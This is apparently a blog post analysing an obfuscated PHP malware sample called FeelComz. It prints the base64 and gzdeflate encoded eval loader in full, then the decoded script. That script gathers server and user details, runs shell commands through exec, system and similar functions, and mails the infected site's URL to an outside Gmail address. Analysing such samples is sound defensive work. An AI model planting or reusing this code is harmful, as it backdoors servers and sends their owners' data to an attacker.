This is a novel version of FeelComz attack. Trying to hide his code from novice victims. The code is first
encoded by php function base64_encode, and then compressed by php gzdeflate function.
##[ Fx29ID ]##
fx("ID","FeeL"."CoMz");
function fx($t,$c) { echo "$t: "; echo (is_array($c))?join(" ",$c):$c; echo "
"; }
eval(gzinflate(base64_decode('
rVZRc9oxEH7vTP/DongS06GEcLmmoSWQFnNk2gTO
4LYzhPEYx4BbI3sku4Fm+t+7krAxN22e7sVG3+5+
++1qLdG5extJVsnzZ8YIANrQXdLUfwjM6huEbkY5
RNl3k4wt+5xlu9e9nk2U3bnpoX2xaV7SDfVNEgYK
X2zQ97pvkVpXxAu6jgNqVjtkeEdaZNjvFz7DMXqM
BiN3OM4h5+76VsahJDdj3hoDC0aVndRMlFXt4KNF
XhZUzliapFLxzzinLHUzQfk+GqXKUHxhLD5bJAuD
NqnLkPUWf5vVOoFlCVtKLA/v3SC9McqXI8u+Rbpu
KNwHHqbePKImWrHI6ecZVjm1Z4W0QQ8zE0fQoAWk
vgoCk6A07BTm63NKC3SBC4VO4tSLCjiVK1JSMu47
d+91sUEoFhnztc6joyn0vzQvxwPri/UeZkdHuEUP
dI5bZLi6e1MymxxG7mA4npCZ3MGQfT0w29a/jjWe
uI59ox3mcbBFD+LYH0GSqYh75si9AUNsRUrXBB3X
XhiZxA/Teca6S7xq+/EaC195IoxA+B6DVZomrdPT
nIbUgCh+3SqsIw1jBvuRgUfgNM04A+w0C10s2CTS
7Eo7qcLQBsrpMjRxzLAhv/OpQhU6MLEdC1rQv/44
tt7Az1K2chMxn8HpDyyXbpJISkD9JVp0lDvt5sFC
7kohsULXSbo1JQMOxny1PM69LX5KBxkpkySBaUik
XGPu4dJNKFKROxwfAx6Z70WRHrMCrYTM1RkUVjuY
h6erLj5Zw18HqOH5s3ABZq6MSJNs3SMUTjUjxjp2
7fkah8wk9/weu65w5KxRoAckYkWjyN1T7WL3sE7+
h2A9WCqwG89dkXo8lZ3sakseuyOVLurbjxkeVdg7
6YkYZYHrR9Rj5h/yJJ4x6Ypnv8mUm/63VHFCGcn3
k1MRZ9zH/VwhqbKpRPUTaF4dn53U4ISfqOl9hIdV
GFEwobKg8QIDNKr01PH4xdTDaVrVoNm4fIXJ4Sck
fhQLyb3Xst8BYnEe8wpRpt3wSRN+hOUZ+S7CH0gh
n8WEVFA5y9aUh/7OUhrg/xzpfDoElB9cteGscfHX
xfnZ6+a51q/wNvA4Y4FmO927vDhrNKq4bgAeiP+8
Iwc9LXOev/774tUThMp+wHb7BNuT2v6j6kOJpxSj
33Ug8O6wxRLXPS63WZ7xRrpNdJPxFi7fwWBM5Bo/
62+uugdckXi+umvQ1i9s8uo4MDlSyARe4i95imMS
ZUVUnxi7WwXaVxk+T6x4HKsrCEpoX6Lquiqjjrpv
8rpy8qkqY6ZL7OD/il8=
')));
die("FeeLCoMz");
Author's note: DO NOT DECODE such encrypted strings at your own computer!!
Instead, use online services such as: http://www.tareeinternet.com/scripts/decrypt.php
Following is the decoded version of above strings:
$P = @getcwd();
$IP = @getenv("SERVER_ADDR");
$UID = fx29exec("id");
fx("SAFE",@safemode()?"ON":"OFF");
fx("OS",@PHP_OS);
fx("UNAME",@php_uname());
fx("SERVER",($IP)?$IP:"-");
fx("USER",@get_current_user());
fx("UID",($UID)?$UID:"uid=".@getmyuid()." gid=".@getmygid());
fx("DIR",$P);
fx("PERM",(@is_writable($P))?"[W]":"[R]");
fx("HDD","Used: ".hdd("used")." Free: ".hdd("free")." Total: ".hdd("total"));
fx("DISFUNC",@getdisfunc());
##[ FX29SHEXEC ]##
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$body = "URL $web$inj \nUname $system";
mail("citbun@gmail.com","hasil scan http://$web$inj", "$body");
function safemode() {
return (@ini_get("safe_mode") OR eregi("on",@ini_get("safe_mode")) ) ? TRUE : FALSE;
}
function getdisfunc() {
$rez = explode(",",@ini_get("disable_functions"));
return (!empty($rez))?$rez:array();
}
function enabled($func) {
return (function_exists($func) && is_callable($func) && !in_array($func,getdisfunc())) ? TRUE : FALSE;
}
function fx29exec($cmd) {
if (enabled("exec")) { exec($cmd,$o);
$rez = join("\r\n",$o);
} elseif (enabled("shell_exec")) {
$rez = shell_exec($cmd);
}elseif (enabled("system")) {
@ob_start();
@system($cmd);
$rez = @ob_get_contents();
@ob_end_clean();
}elseif (enabled("passthru")) {
@ob_start();
passthru($cmd);
$rez = @ob_get_contents();
@ob_end_clean();
}elseif (enabled("popen") && is_resource($h = popen($cmd.' 2>&1', 'r')) ) {
while ( !feof($h) ) {
$rez .= fread($h, 2096);
}
pclose($h);
}else {
$rez = "Error!";
}
return $rez;
}
function vsize($size) {
if (!is_numeric($size)) {
return FALSE;
}else {
if ( $size >= 1073741824 ) {
$size = round($size/1073741824*100)/100 ." GB"; }
elseif ( $size >= 1048576 ) {
$size = round($size/1048576*100)/100 ." MB";
}elseif ( $size >= 1024 ) {
$size = round($size/1024*100)/100 ." KB";
}else {
$size = $size . " B";
}
return $size;
}
}
function hdd($type) {
$P = @getcwd();
$T = @disk_total_space($P);
$F = @disk_free_space($P);
$U = $T - $U;
$hddspace = array("total" => vsize($T), "free" => vsize($F), "used" => vsize($U));
return $hddspace[$type];
}
As you might notice, there is nothing new other than base64 encoding and compressing of the code, when
compared to others.
Tidak ada komentar:
Posting Komentar